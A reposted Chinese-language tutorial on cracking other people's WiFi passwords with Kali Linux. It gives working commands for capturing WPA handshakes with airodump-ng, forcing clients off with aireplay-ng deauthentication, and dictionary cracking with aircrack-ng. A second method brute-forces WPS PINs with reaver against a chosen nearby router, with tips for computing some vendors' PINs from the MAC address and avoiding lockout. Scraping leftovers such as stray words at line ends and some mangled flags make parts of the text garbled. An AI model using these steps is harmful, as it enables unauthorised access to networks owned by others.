Kali Linux實戰篇:如何使用Kali破解WIFI密碼?


轉載於:最全資料庫
微信

若有侵權聯繫小編刪文
網絡


利用kali破解wifi密碼

準備工具

1.筆記本
2.USB無線上網卡(必備)
3.kali系統
4.密碼字典

第一種方法

暴力破解法dom

何爲暴力破解呢,其實就是一個一個密碼去試,直到正確的密碼。工具

    如今的wifi通常加密都是:加密

1. WEP(有線等效加密)——採用WEP64位或者128位數據加密。
2.WPA-PSK[TKIP]———採用預共享祕鑰的WI-FI保護訪問,採用WPA-PSK標準加密技術,加密類型爲TKIP。
3.WPA-PSK[TKIP]+WPA2-PSK[AES]———容許客戶端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。

進入正題:spa

1. 第一步.net

進入kali在終端輸入以下3d

airmon-ng

    列出網卡信息orm

2. 第二步blog

輸入:

airmon-ng start wlan0

開啓網卡監控

 可使用ifconfig命令查看一下網卡信息:

ifconfig

    能夠看到網卡的名字已經變了

3. 第三步

airodump-ng wlan0mon

    掃描wifi信號

    這裏我用本身家的wifi作實驗

4. 第四步

    上圖能夠看出

BSSID是50:3A:A0:33:B2:8C    信道(CH)是:2

    輸入:

airodump-ng -w freedom -c 2 -–bssid  50:3A:A0:33:B2:8C wlan0mon –ignore-negative-one

 抓去握手包

     -c:指定信道

     -w:指定抓去握手包的存放位置或者名字,freedom是一會抓去的握手包的名字

     --bssid:指定路由器的MAC

5. 第五步

    再開一個終端輸入命令:

aireplay-ng – -deatu 10 -a 路由器MAC -c 客戶機MAC wlan0mon – -ignore-negative-one

    使用airplay-ng工具強制斷開已經鏈接到wifi的設備從新鏈接路由器,來進行抓去數據包

        –deatu:指定發送反認證包的個數,也可使用-0(阿利伯數字0)來指定反認證包的個數

        -a:指定路由器的MAC

        -c:指定客戶機的MAC

6. 第六步

    破解握手包

aircrack-ng -a -w dict freedom-*.cap

     -a1:指定WEP加密方式

     -a2:指定WPA-PSk加密方式

     dict:字典的名字

     freedom-*.cap:握手包

這個就是個人wifi密碼

破解完成,成功與否靠強大的字典和運氣了。


 第二種方法

 1.第一步

    Wash掃描開啓WPS的網絡

wash -i wlan0mon [-C]

  小編周圍沒有開啓WPS功能的wifi,就會出現上圖那樣,這咋辦。。。

    不要急,由於有些隱藏了起來,咱們直接霸王硬上弓

    用前面那個掃wifi的命令:

 airodump-ng wlan0mon

看見小編圈起來的MAC沒有,選擇一個PWR的值的絕對值小於70的wifi破解

2. 第二步

    選擇一個路由器

    我在這選擇的是名字爲:FAST_F70E的wifi

    就他了:E4:D3:32:7F:F7:0E  -45        2        0    0   6  54e. WPA2 CCMP   PSK  FAST_F70E

    而後命令以下:

reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv

    E4:D3:32:7F:F7:0E 這個mac根據路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E

    如圖上表示能夠破解,開啓了wps功能

 出現上圖這樣,就表示不能破解換其餘wifi破解吧孩子    

  這樣就表示破解出來了

    小知識:

    若是密碼被改了你知道他wifi的pin碼就用以下命令:reaver-i mon0 -b MAC -p PIN

    pin碼有8位:因此就是10的8次方,要窮舉1000000000次

    這樣pin也是有限制的,好比要被pin出的路由器必須得開啓wps功能;貌似如今不少都是防pin路由器或300秒pin限制的。

    有些路由pin碼能夠經過計算獲得:騰達和磊科的產品若是路由MAC地址是以「C83A35」或「00B00C」打頭那麼能夠直接計算出PIN值。

    好比這個:bssid :Tenda_579A18    mac :C8:3A:35:57:9A:18  經過計算器將mac後6位換算成10進制數,獲得5741080(pin碼的前7位),最多試10次或經過軟件獲得該路由pin碼! 

    破解時推薦這個命令:

reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv

    由於–d9 –t9參數能夠防止pin死路由器。


本文分享自微信公衆號 - 釋然IT雜談(gh_ad4551519762)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索